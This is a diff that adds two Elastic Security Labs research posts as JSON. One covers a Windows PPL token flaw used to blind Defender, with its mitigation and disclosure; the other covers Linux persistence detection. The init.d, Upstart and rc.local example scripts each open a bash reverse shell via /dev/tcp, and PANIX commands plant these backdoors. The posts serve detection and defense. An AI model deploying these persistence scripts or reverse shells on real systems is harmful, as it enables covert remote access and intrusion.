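The access check that blocks `taskkill.exe` can be illustrated with the process access-right bit masks involved. The constants below are the real values from the Windows SDK (`winnt.h`); the check itself is a deliberate simplification of the kernel's behavior, shown only to make the mask arithmetic concrete:

```python
# Process access-right constants from winnt.h (Windows SDK)
PROCESS_TERMINATE                 = 0x0001
PROCESS_QUERY_INFORMATION         = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Simplified model: against a PPL target, a non-PPL caller is only
# granted the "limited" query right, so any request that includes
# PROCESS_TERMINATE fails with access denied.
PPL_GRANTED_TO_NON_PPL = PROCESS_QUERY_LIMITED_INFORMATION

def open_process_allowed(requested: int, granted_mask: int) -> bool:
    """Access succeeds only if every requested bit is in the granted mask."""
    return (requested & ~granted_mask) == 0

# taskkill.exe asks for PROCESS_TERMINATE -> denied
print(open_process_allowed(PROCESS_TERMINATE, PPL_GRANTED_TO_NON_PPL))
# A limited query still succeeds -> allowed
print(open_process_allowed(PROCESS_QUERY_LIMITED_INFORMATION, PPL_GRANTED_TO_NON_PPL))
```

This is why tools running as SYSTEM can still enumerate a PPL process but cannot obtain a terminate-capable handle to it.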
That being said, with PROCESS_TERMINATE blocked, let’s see if there are other ways we can interfere with it instead.\n\n## Windows Tokens\n\nA Windows token can be thought of as a security credential. It says who you are and what you’re allowed to do. Typically when a user runs a process, that process runs with their token and can do anything the user can do. Some of the most important data within a token include:\n\n- User identity\n- Group membership (e.g. Administrators)\n- Privileges (e.g. SeDebugPrivilege)\n- Integrity level\n\nTokens are a critical part of Windows authorization. Any time a Windows thread accesses a [securable object](https://docs.microsoft.com/en-us/windows/win32/secauthz/securable-objects), the OS performs a security check. It compares the thread’s effective token against the [security descriptor](https://docs.microsoft.com/en-us/windows/win32/secauthz/security-descriptors) of the object being accessed. You can read more about tokens in the Microsoft [access token documentation](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens) and the Elastic blog post that [introduces Windows tokens](https://www.elastic.co/blog/introduction-to-windows-tokens-for-security-practitioners).\n\n### Sandboxing Tokens\n\nSome applications, such as web browsers, have been repeated targets of exploitation. Once an attacker successfully exploits a browser process, the exploit payload can perform any action that the browser process can perform. This is because it shares the browser’s token.\n\nTo mitigate the damage from such attacks, web browsers have moved much of their code into lower-privilege worker processes. This is typically done by creating a restricted security context called a sandbox. When a sandboxed worker needs to perform a privileged action on the system, such as saving a downloaded file, it can ask a non-sandboxed “broker” process to perform the action on its behalf. 
If the sandboxed process is exploited, the goal is to limit the payload’s ability to cause harm to only resources accessible by the sandbox.\n\nWhile modern sandboxing involves several components of OS security, one of the most important is a low-privilege, or restricted, token. New sandbox tokens can be created with APIs such as [CreateRestrictedToken](https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-createrestrictedtoken). Sometimes a sandboxed process needs to lock itself down after performing some initialization. The [AdjustTokenPrivileges](https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokenprivileges) and [AdjustTokenGroups](https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokengroups) APIs allow this adjustment. These APIs enable privileges and groups to be “forfeit” from an existing process’s token in such a way that they cannot be restored without creating a new token outside the sandbox.\n\nOne [commonly used sandbox](https://chromium.googlesource.com/chromium/src/+/master/docs/design/sandbox.md) today is part of Google Chrome. Even some [security products](https://www.microsoft.com/security/blog/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox/) are getting into sandboxing these days.\n\n### Accessing Tokens\n\nWindows provides the [OpenProcessToken](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocesstoken) API to enable interaction with process tokens. MSDN states that one must have the PROCESS_QUERY_INFORMATION right to use OpenProcessToken. Since a non-protected process can only get PROCESS_QUERY_LIMITED_INFORMATION access to a PPL process (note the LIMITED), it is seemingly impossible to get a handle to a PPL process’s token. However, MSDN is incorrect in this case. 
With only PROCESS_QUERY_LIMITED_INFORMATION, we can successfully open the token of a protected process. [James Forshaw](https://twitter.com/tiraniddo) explains this documentation discrepancy in more depth, showing the underlying [decompiled kernel code](https://www.tiraniddo.dev/2017/05/reading-your-way-around-uac-part-2.html).\n\nTokens are themselves securable objects. As such, regular access checks still apply. The effective token of the thread attempting to access the token is checked against the security descriptor of the token being accessed for the requested access rights (TOKEN_QUERY, TOKEN_WRITE, TOKEN_IMPERSONATE, etc). For more detail about access checks, see the Microsoft article, “[How Access Checks Work](https://docs.microsoft.com/en-us/windows/win32/secauthz/how-dacls-control-access-to-an-object).”\n\n## The Attack\n\n[Process Hacker](https://github.com/processhacker/processhacker/releases/tag/v2.39) provides a nice visualization of token security descriptors. Taking a look at Windows Defender’s (MsMpEng.exe) token, we see the following Discretionary Access Control List (DACL):\n\n\n\nNote that the SYSTEM user has full control over the token. This means, unless some other mechanism is protecting the token, a thread [running as SYSTEM](https://powersploit.readthedocs.io/en/latest/Privesc/Get-System/) can modify the token. When such modification is possible, it violates the desired “PPL is protected from administrators” design goal.\n\n### Demo\n\nAlas, there is no other mechanism protecting the token. Using this technique, an attacker can forcefully remove all privileges from the MsMpEng.exe token and reduce it from [system to untrusted integrity](https://docs.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control). 
Being nerfed to untrusted integrity prevents the victim process from accessing most securable resources on the system, quietly incapacitating the process without terminating it.\n\n\n\nIn this video, the attacker could have further restricted the token, but the privilege and integrity changes were sufficient to prevent MsMpEng.exe from detecting and blocking a Mimikatz execution. We felt this illustrated a valid proof of concept.\n\n## Defense\n\nNewer versions of Windows include an undocumented feature called “trust labels.” Trust labels are part of the [System Access Control List](https://docs.microsoft.com/en-us/windows/win32/ad/retrieving-an-objectampaposs-sacl) (SACL), an optional component of every security descriptor. Trust labels allow Windows to restrict specific access rights to certain types of protected processes. For example, Windows [protects](https://www.elastic.co/blog/protecting-windows-protected-processes) the \\KnownDlls object directory from [modification by malicious administrators](https://www.elastic.co/blog/detect-block-unknown-knowndlls-windows-acl-hardening-attacks-cache-poisoning-escalation) using a trust label. We can see this with [WinObjEx64](https://github.com/hfiref0x/WinObjEx64):\n\n\n\nLike \\KnownDlls, tokens are securable objects, and thus it is possible to protect them against modification by malicious administrators. Elastic Security does this, in fact, and is immune to this attack, by denying TOKEN_WRITE access to processes with a trust label below “Anti-Malware Light.” Because this protection is applied at runtime, however, there is still a brief window of vulnerability until it can apply the trust label.\n\nIdeally, Windows would apply such a trust label to each PPL process’s token as it is created. This would eliminate the race condition and fix the vulnerability in the PPL mechanism. There is precedent. 
With a kernel debugger, we can see that Windows is already protecting the System process’ token on Windows (21H1 shown below) with a trust label:\n\n```\n1: kd> dx -r1 (((nt!_OBJECT_HEADER*)((@$cursession.Processes[0x4]->KernelObject->Token->Object - sizeof(nt!_OBJECT_HEADER)) & ~0xf))->SecurityDescriptor & ~0xf)\n(((nt!_OBJECT_HEADER*)((@$cursession.Processes[0x4]->KernelObject->Token->Object - sizeof(nt!_OBJECT_HEADER)) & ~0xf))->SecurityDescriptor & ~0xf) : 0xffffe00649c46c20\n1: kd> !sd 0xffffe00649c46c20\n->Revision: 0x1\n->Sbz1 : 0x0\n->Control : 0x8814\n SE_DACL_PRESENT\n SE_SACL_PRESENT\n SE_SACL_AUTO_INHERITED\n SE_SELF_RELATIVE\n->Owner : S-1-5-32-544\n->Group : S-1-5-32-544\n->Dacl :\n->Dacl : ->AclRevision: 0x2\n->Dacl : ->Sbz1 : 0x0\n->Dacl : ->AclSize : 0x1c\n->Dacl : ->AceCount : 0x1\n->Dacl : ->Sbz2 : 0x0\n->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE\n->Dacl : ->Ace[0]: ->AceFlags: 0x0\n->Dacl : ->Ace[0]: ->AceSize: 0x14\n->Dacl : ->Ace[0]: ->Mask : 0x000f01ff\n->Dacl : ->Ace[0]: ->SID: S-1-5-18\n\n->Sacl :\n->Sacl : ->AclRevision: 0x2\n->Sacl : ->Sbz1 : 0x0\n->Sacl : ->AclSize : 0x34\n->Sacl : ->AceCount : 0x2\n->Sacl : ->Sbz2 : 0x0\n->Sacl : ->Ace[0]: ->AceType: SYSTEM_MANDATORY_LABEL_ACE_TYPE\n->Sacl : ->Ace[0]: ->AceFlags: 0x0\n->Sacl : ->Ace[0]: ->AceSize: 0x14\n->Sacl : ->Ace[0]: ->Mask : 0x00000001\n->Sacl : ->Ace[0]: ->SID: S-1-16-16384\n\n->Sacl : ->Ace[1]: ->AceType: SYSTEM_PROCESS_TRUST_LABEL_ACE_TYPE\n->Sacl : ->Ace[1]: ->AceFlags: 0x0\n->Sacl : ->Ace[1]: ->AceSize: 0x18\n->Sacl : ->Ace[1]: ->Mask : 0x00020018\n->Sacl : ->Ace[1]: ->SID: S-1-19-1024-8192\n\n```\n\nThe SYSTEM_PROCESS_TRUST_LABEL_ACE_TYPE access control entry limits access to READ_CONTROL, TOKEN_QUERY, and TOKEN_QUERY_SOURCE (0x00020018) unless the caller is a WinTcb protected process (SID S-1-19-1024-8192). 
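SID strings like the one in that trust-label ACE decompose mechanically into revision, identifier authority, and sub-authority fields. The following minimal parser is our own illustration (the function and field names are not from any Windows API):

```python
def parse_sid(sid: str) -> dict:
    """Split an SDDL-style SID string (e.g. 'S-1-19-1024-8192') into its
    revision, identifier authority, and sub-authority components.
    Illustrative only; not a full SDDL parser."""
    parts = sid.split("-")
    if parts[0] != "S":
        raise ValueError("not a SID string")
    return {
        "revision": int(parts[1]),
        "authority": int(parts[2]),           # 19 = SECURITY_PROCESS_TRUST_AUTHORITY
        "subauthorities": [int(p) for p in parts[3:]],
    }

print(parse_sid("S-1-19-1024-8192"))
# {'revision': 1, 'authority': 19, 'subauthorities': [1024, 8192]}
```

For process-trust SIDs, the first sub-authority encodes the protection type and the second the protection level, as broken down next.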
That SID can be interpreted as follows:\n\n- 1: [Revision 1](https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L1794)\n- 19: [SECURITY_PROCESS_TRUST_AUTHORITY](https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L2097)\n- 1024:\n [SECURITY_PROCESS_PROTECTION_TYPE_FULL_RID](https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L2100)\n- 8192:\n [SECURITY_PROCESS_PROTECTION_LEVEL_WINTCB_RID](https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L2104)\n\n### Mitigation\n\nAlongside this article, we are releasing an update to the [PPLGuard](https://github.com/elastic/PPLGuard) proof-of-concept that protects all running anti-malware PPL processes against this attack. It includes example code that anti-malware products can employ to protect themselves. Here it is in action, protecting Defender:\n\n\n\n## Disclosure\n\nWe disclosed this vulnerability and proposed fixes to the [Microsoft Security Response Center](https://www.microsoft.com/en-us/msrc?rtc=1) (MSRC) on 2022-01-05. They responded on 2022-01-24 that they have classified it as moderate severity, and will not address it with a security update. However, they may address it in a future version of Windows.\n\n## Conclusion\n\nIn this article, we disclosed a flaw in the Windows Protected Process Light (PPL) mechanism. We then demonstrated how malware can use this flaw to neutralize PPL anti-malware products. Finally, we showed a simple ACL fix (with sample code) that anti-malware products can employ to defend against this attack. Elastic Security already incorporates this fix, but we hope that Windows implements it (or something equivalent) by default in the near future.\n"
+ },
+ "title": "Sandboxing Antimalware Products for Fun and Profit",
+ "slug": "sandboxing-antimalware-products",
+ "date": "2023-02-21",
+ "description": "This article demonstrates a flaw that allows attackers to bypass a Windows security mechanism which protects anti-malware products from various forms of attack.",
+ "author": [
+ {
+ "slug": "gabriel-landau"
+ }
+ ],
+ "image": "blog-thumb-tools-various.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-sandboxing_antimalware_products-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sequel_on_persistence_mechanisms-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sequel_on_persistence_mechanisms-md.json
new file mode 100644
index 00000000000..cbfed9a33e6
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sequel_on_persistence_mechanisms-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Linux Detection Engineering - A Sequel on Persistence Mechanisms\"\nslug: \"sequel-on-persistence-mechanisms\"\ndate: \"2024-08-30\"\nsubtitle: \"A walkthrough on how threat actors establish persistence on Linux systems and how to hunt for these techniques.\"\ndescription: \"In this final part of this Linux persistence series, we'll continue exploring persistence mechanisms on Linux systems, focusing on more advanced techniques and how to detect them.\"\nauthor:\n - slug: ruben-groenewoud\nimage: \"sequel-on-persistence-mechanisms.jpg\"\ncategory:\n - slug: detection-science\ntags:\n - linux\n - persistence\n---\n\n## Introduction\n\nIn this third part of the [Linux Detection Engineering series](https://search.elastic.co/?q=Linux%20Detection%20Engineering&location%5B0%5D=Security%20Labs&author%5B0%5D=Ruben%20Groenewoud), we’ll dive deeper into the world of Linux persistence. We start with common or straightforward methods and move towards more complex or obscure techniques. The goal remains the same: to educate defenders and security researchers on the foundational aspects of Linux persistence by examining both trivial and more complicated methods, understanding how these methods work, how to hunt for them, and how to develop effective detection strategies.\n\nIn the previous article - \"Linux Detection Engineering - a primer on persistence mechanisms\" - we explored the foundational aspects of Linux persistence techniques. If you missed it, you can find it [here](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms).\n\nWe'll set up the persistence mechanisms, analyze the logs, and observe the potential detection opportunities. To aid in this process, we’re sharing [PANIX](https://github.com/Aegrah/PANIX), a Linux persistence tool that Ruben Groenewoud of Elastic Security developed. 
PANIX simplifies and customizes persistence setup to test potential detection opportunities.\n\nBy the end of this series, you'll have gained a comprehensive understanding of each of the persistence mechanisms that we covered, including:\n\n* How it works (theory)\n* How to set it up (practice)\n* How to detect it (SIEM and Endpoint rules)\n* How to hunt for it (ES|QL and OSQuery reference hunts)\n\nLet’s go beyond the basics and dig a little bit deeper into the world of Linux persistence, it’s fun!\n\n## Setup note\n\nTo ensure you are prepared to detect the persistence mechanisms discussed in this article, it is important to [enable and update our pre-built detection rules](https://www.elastic.co/guide/en/security/current/prebuilt-rules-management.html#update-prebuilt-rules). If you are working with a custom-built ruleset and do not use all of our pre-built rules, this is a great opportunity to test them and potentially fill in any gaps. Now, we are ready to get started. \n\n## T1037 - boot or logon initialization scripts: Init\n\nInit, short for \"initialization,\" is the first process started by the kernel during the boot process on Unix-like operating systems. It continues running until the system is shut down. The primary role of an init system is to start, stop, and manage system processes and services.\n\nThere are three major init implementations - [Systemd](https://man7.org/linux/man-pages/man1/systemd.1.html), [System V](https://linux.die.net/man/8/service), and [Upstart](https://linux.die.net/man/7/upstart). In [part 1](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms) of this series, we focused on Systemd. In this part, we will explore System V and Upstart. MITRE does not have specific categories for System V or Upstart. 
These are generally part of [T1037](https://attack.mitre.org/techniques/T1037/).\n\n### T1037 - boot or logon initialization scripts: System V init\n\n[System V (SysV) init](https://linux.die.net/man/8/service) is one of the oldest and most traditional init systems. SysV init scripts are gradually being replaced by modern init systems like Systemd. However, `systemd-sysv-generator` allows Systemd to handle traditional SysV init scripts, ensuring older services and applications can still be managed within the newer framework.\n\nThe `/etc/init.d/` directory is a key component of the SysV init system. It is responsible for controlling the startup, running, and shutdown of services on a system. Scripts in this directory are executed at different run levels to manage various system services. Despite the rise of Systemd as the default init system in many modern Linux distributions, `init.d` scripts are still widely used and supported, making them a viable option for persistence.\n\nThe scripts in `init.d` are used to start, stop, and manage services. These scripts are executed with root privileges, providing a powerful means for both administrators and attackers to ensure certain commands or services run on boot. These scripts are often linked to [runlevel](https://linux.die.net/man/7/runlevel) directories like `/etc/rc0.d/`, `/etc/rc1.d/`, etc., which determine when the scripts are run. Runlevels, ranging from 0 to 6, define specific operational states, each configuring different services and processes to manage system behavior and user interactions. Runlevels vary depending on the distribution, but generally look like the following:\n\n* 0: Shutdown\n* 1: Single User Mode\n* 2: Multiuser mode without networking\n* 3: Multiuser mode with networking\n* 4: Unused\n* 5: Multiuser mode with networking and GUI\n* 6: Reboot\n\nDuring system startup, scripts are executed based on the current runlevel configuration. 
Each script must follow a specific structure, including `start`, `stop`, `restart`, and `status` commands to manage the associated service. Scripts prefixed with `S` (start) or `K` (kill) dictate actions during startup or shutdown, respectively, ordered by their numerical sequence.\n\nAn [example](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L1864-L1881) of a malicious `init.d` script might look similar to the following:\n\n```\n#! /bin/sh\n### BEGIN INIT INFO\n# Provides: malicious-sysv-script\n# Required-Start: $remote_fs $syslog\n# Required-Stop: $remote_fs $syslog\n# Default-Start: 2 3 4 5\n# Default-Stop: 0 1 6\n### END INIT INFO\n\ncase \"$1\" in\n start)\n echo \"Starting malicious-sysv-script\"\n nohup setsid bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'\n ;;\nesac\n```\n\nThe script must be placed in the `/etc/init.d/` directory and be granted execution permissions. Similarly to Systemd services, SysV scripts must also be enabled. A common utility to manage SysV configurations is `update-rc.d`. It allows administrators to enable or disable services and manage the symbolic links (start and kill scripts) in the `/etc/rc*.d/` directories, automatically setting the correct runlevels based on the configuration of the script.\n\n```\nsudo update-rc.d malicious-sysv-script defaults\n```\n\nThe `malicious-sysv-script` is now enabled and ready to run on boot. MITRE specifies more information and real-world examples related to this technique in [T1037](https://attack.mitre.org/techniques/T1037/).\n\n#### Persistence through T1037 - System V init\n\nYou can manually set up a test script within the `/etc/init.d/` directory, grant it execution permissions, enable it, and reboot it, or simply use [PANIX](https://github.com/aegrah/PANIX). PANIX is a Linux persistence tool that simplifies and customizes persistence setup for testing your detections. 
We can use it to establish persistence simply by running:\n\n```\n> sudo ./panix.sh --initd --default --ip 192.168.1.1 --port 2006\n> [+] init.d backdoor established with IP 192.168.1.1 and port 2006.\n```\n\nPrior to rebooting and actually establishing persistence, we can see the following documents being generated in Discover:\n\n\n\nAfter executing PANIX, it generates a SysV init script named `/etc/init.d/ssh-procps`, applies executable permissions using `chmod +x`, and utilizes `update-rc.d`. This command triggers `systemctl daemon-reload`, which, in turn, activates the `systemd-sysv-generator` to enable `ssh-procps` during system boot.\n\nLet’s reboot the system and look at the events that are generated on shutdown/boot.\n\n\n\nAs the SysV init system is loaded early, the start command is not logged. Since it is impossible to detect an event before events are being ingested, we need to be creative in detecting this technique. Elastic will capture `already_running` event actions for service initialization events. Through this chain we are capable of detecting the execution of the service, followed by the reverse shell that was initiated. 
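As a complement to these rules, a quick manual triage can go a long way. The following snippet is a minimal, self-contained sketch (the temporary directory stands in for `/etc/init.d/`, and the file names are illustrative) that flags init scripts embedding reverse-shell primitives:

```shell
# Minimal triage sketch (not an Elastic rule): flag SysV init scripts
# that embed reverse-shell primitives. The temporary directory stands
# in for /etc/init.d/ and the file names are illustrative.
INITD="$(mktemp -d)"
printf '#!/bin/sh\nnohup setsid bash -c "bash -i >& /dev/tcp/192.168.1.1/2006 0>&1"\n' > "$INITD/ssh-procps"
printf '#!/bin/sh\necho "starting cron"\n' > "$INITD/cron"
# List only the scripts that reference bash network redirection devices.
grep -rlE '/dev/(tcp|udp)/' "$INITD"
```

On a live system, the same `grep` pointed at `/etc/init.d/` directly gives a fast first pass; every hit still needs manual review.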
We have several detection opportunities for this persistence technique.\n\n| Category | Coverage |\n|----------|--------------------------------------------------------------|\n| File | [System V Init Script Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_init_d_file_creation.toml) |\n| | [Suspicious File Creation in /etc for Persistence](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_etc_file_creation.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [System V Init (init.d) Executed Binary from Unusual Location](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_system_v_init_(init.d)_executed_binary_from_unusual_location.toml) |\n| | [Executable Bit Set for Potential Persistence Script](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml) |\n| Network | [System V Init (init.d) Egress Network Connection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_system_v_init_(init.d)_egress_network_connection.toml) |\n\n\n\n#### Hunting for T1037 - System V init\n\nOther than relying on detections, it is important to incorporate threat hunting into your workflow, especially for persistence mechanisms like these, where events can potentially be missed due to timing. This blog will solely list the available hunts for each persistence mechanism; however, more details regarding this topic are outlined at the end of the first section in [the previous article on persistence](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms). 
Additionally, descriptions and references can be found in our [Detection Rules repository](https://github.com/elastic/detection-rules), specifically in the [Linux hunting subdirectory](https://github.com/elastic/detection-rules/tree/main/hunting).\n\nWe can hunt for System V Init persistence through [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html) and [OSQuery](https://www.elastic.co/guide/en/kibana/current/osquery.html), focusing on unusual process executions and file creations. The [Persistence via System V Init](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_sysv_init.toml) rule contains several ES|QL and OSQuery queries that can help hunt for these types of persistence.\n\n### T1037 - boot or logon initialization scripts: Upstart\n\n[Upstart](https://linux.die.net/man/7/upstart) was introduced as an alternative init system designed to improve boot performance and manage system services more dynamically than traditional SysV init. While it has been largely supplanted by systemd in many Linux distributions, Upstart is still used in some older releases and legacy systems.\n\nThe core of Upstart's configuration resides in the `/etc/init/` directory, where job configuration files define how services are started, stopped, and managed. Each job file specifies dependencies, start conditions, and actions to be taken upon start, stop, and other events.\n\nIn Upstart, run levels are replaced with events and tasks, which define the sequence and conditions under which jobs are executed. Upstart introduces a more event-driven model, allowing services to start based on various system events rather than predefined run levels.\n\nUpstart can run system-wide or in user-session mode. 
While system-wide configurations are placed in the `/etc/init/` directory, user-session mode configurations are located in:\n\n* `~/.config/upstart/`\n* `~/.init/`\n* `/etc/xdg/upstart/`\n* `/usr/share/upstart/sessions/`\n\nAn example of an Upstart job file can look like this:\n\n```\ndescription \"Malicious Upstart Job\"\nauthor \"Ruben Groenewoud\"\n\nstart on runlevel [2345]\nstop on shutdown\n\nexec nohup setsid bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'\n```\n\nThe `malicious-upstart-job.conf` file defines a job that starts on run levels 2, 3, 4, and 5 (general Linux access and networking), and stops on run levels 0, 1, and 6 (shutdown/reboot). The `exec` line executes the malicious payload to establish a reverse shell connection when the system boots up.\n\nTo enable the Upstart job and ensure it runs on boot, the job file must be placed in `/etc/init/` and given appropriate permissions. Upstart jobs are automatically recognized and managed by the `Upstart init daemon`.\n\nUpstart was deprecated a long time ago, with Linux distributions such as Debian 7 and Ubuntu 16.04 being the final systems that leverage Upstart by default. Newer releases moved to systemd, removing compatibility with Upstart altogether. Based on the data in our [support matrix](https://www.elastic.co/support/matrix), only the Elastic Agent in Beta version supports some of these old operating systems, and the recent version of Elastic Defend does not run on them at all. These systems have been EOL for years and should not be used in production environments anymore.\n\nFor this reason, we added support/coverage for this technique to the [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) detection rule. 
If you are still running these systems in production, using, for example, old versions of [Auditbeat](https://www.elastic.co/beats/auditbeat) to gather its logs, you can set up [Auditbeat file creation](https://www.elastic.co/guide/en/beats/auditbeat/current/configuration-auditbeat.html) and [FIM](https://www.elastic.co/docs/current/integrations/fim) file modification rules in the `/etc/init/` directory, similar to the techniques mentioned in the [previous blog](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms), and in the sections yet to come. Similarly to System V Init, information and real-world examples related to this technique are specified by MITRE in [T1037](https://attack.mitre.org/techniques/T1037/).\n\n## T1037.004 - boot or logon initialization scripts: run control (RC) scripts\n\nThe [rc.local](https://man.freebsd.org/cgi/man.cgi?rc.local) script is a traditional method for executing commands or scripts on Unix-like operating systems during system boot. It is located at `/etc/rc.local` and is typically used to start services, configure networking, or perform other system initialization tasks that do not warrant a full init script. In Darwin-based systems and very few other Unix-like systems, `/etc/rc.common` is used for the same purpose. \n\nNewer versions of Linux distributions have phased out the `/etc/rc.local` file in favor of Systemd for handling initialization scripts. Systemd provides compatibility through the [systemd-rc-local-generator](https://man7.org/linux/man-pages/man8/systemd-rc-local-generator.8.html) generator; this executable ensures backward compatibility by checking if `/etc/rc.local` exists and is executable. If it meets these criteria, it integrates the `rc-local.service` unit into the boot process. Therefore, as long as this generator is included in the Systemd setup, `/etc/rc.local` scripts will execute during system boot. 
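The generator's activation criteria are simple enough to check by hand: the file must exist and be executable. The snippet below is a self-contained sketch of that check; a temporary file stands in for `/etc/rc.local`:

```shell
# Sketch of the activation check applied by systemd-rc-local-generator:
# rc-local.service is only wired into the boot process when the file
# exists and is executable. A temporary file stands in for /etc/rc.local.
RC_LOCAL="$(mktemp)"
printf '#!/bin/sh\nexit 0\n' > "$RC_LOCAL"
[ -x "$RC_LOCAL" ] && echo "active" || echo "ignored"   # not yet executable
chmod +x "$RC_LOCAL"
[ -x "$RC_LOCAL" ] && echo "active" || echo "ignored"   # would now run at boot
```

On a real host, `test -x /etc/rc.local` (and, on RHEL derivatives, `test -x /etc/rc.d/rc.local`) answers the same question.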
In RHEL derivatives, `/etc/rc.d/rc.local` must be granted execution permissions for this technique to work. \n\nThe `rc.local` script is a shell script that contains commands or scripts to be executed once at the end of the system boot process, after all other system services have been started. This makes it useful for tasks that require specific system conditions to be met before execution. Here’s an example of how a simple backdoored `rc.local` script might look:\n\n```\n#!/bin/sh\n/bin/bash -c 'sh -i >& /dev/tcp/$ip/$port 0>&1'\nexit 0\n```\n\nThe command above creates a reverse shell by opening a bash session that redirects input and output to a specified IP address and port, allowing remote access to the system.\n\nTo ensure `rc.local` runs during boot, the script must be marked executable. On the next boot, the `systemd-rc-local-generator` will create the necessary symlink in order to enable the `rc-local.service` and execute the `rc.local` script. RC scripts did receive their own sub-technique by MITRE. More information and examples of real-world usage of RC Scripts for persistence can be found in [T1037.004](https://attack.mitre.org/techniques/T1037/004/).\n\n### Persistence through T1037.004 - run control (RC) scripts\n\nAs long as the `systemd-rc-local-generator` is present, establishing persistence through this technique is simple. Create the `/etc/rc.local` file, add your payload, and mark it as executable. We will leverage the following PANIX command to establish it for us.\n\n```\n> sudo ./panix.sh --rc-local --default --ip 192.168.1.1 --port 2007\n> [+] rc.local backdoor established \n```\n\nAfter rebooting the system, we can see the following events being generated:\n\n\n\nThe same issue as before arises. We see the execution of PANIX, creating the `/etc/rc.local` file and granting it execution permissions. 
When running `systemctl daemon-reload`, we can see the `systemd-rc-local-generator` creating a symlink in the `/run/systemd/generator[.early|late]` directories. \n\nSimilar to the previous example in which we ran into this issue, we can again use the `already_running` `event.action` documents to get some information on the executions. Digging into this, one method that detects potential traces of `rc.local` execution is to search for documents containing `/etc/rc.local start` entries:\n\n\n\nHere we see `/etc/rc.local` being started, after which a suspicious command is executed. The `/opt/bds_elf` binary is a rootkit that leverages `rc.local` as a persistence method. \n\nAdditionally, we can leverage the [syslog](https://man7.org/linux/man-pages/man3/syslog.3.html) data source, as this file is parsed on initialization of the system integration. You can set up [Filebeat](https://www.elastic.co/beats/filebeat) or the [Elastic Agent](https://www.elastic.co/elastic-agent) with the [System integration](https://www.elastic.co/docs/current/en/integrations/system) to harvest syslog. When looking at potential errors in its execution logs, we can detect other traces of `rc.local` execution events for both our testing and rootkit executions:\n\n\n\nBecause of the challenges in detecting these persistence mechanisms, it is very important to catch traces as early in the chain as possible. 
Leveraging a multi-layered defense strategy increases the chances of detecting techniques like these.\n\n| Category | Coverage |\n|----------|-----------------------------------------------------|\n| File | [rc.local/rc.common File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_rc_script_creation.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [Potential Execution of rc.local Script](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_rc_local_service_already_running.toml) |\n| | [Executable Bit Set for Potential Persistence Script](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml) |\n| Syslog | [Suspicious rc.local Error Message](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_rc_local_error_via_syslog.toml) |\n\n### Hunting for T1037.004 - run control (RC) scripts\n\nSimilar to the System V Init detection opportunity limitations, this technique deals with the same limitations due to timing. Thus, hunting for RC Script persistence is important. We can hunt for this technique by looking at `/etc/rc.local` file creations and/or modifications and the existence of the `rc-local.service` systemd unit/startup item. The [Persistence via rc.local/rc.common](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_rc_local.toml) rule contains several ES|QL and OSQuery queries that aid in hunting for this technique. \n\n## T1037 - boot or logon initialization scripts: Message of the Day (MOTD)\n\n[Message of the Day (MOTD)](https://linux.die.net/man/5/motd) is a feature that displays a message to users when they log in via SSH or a local terminal. 
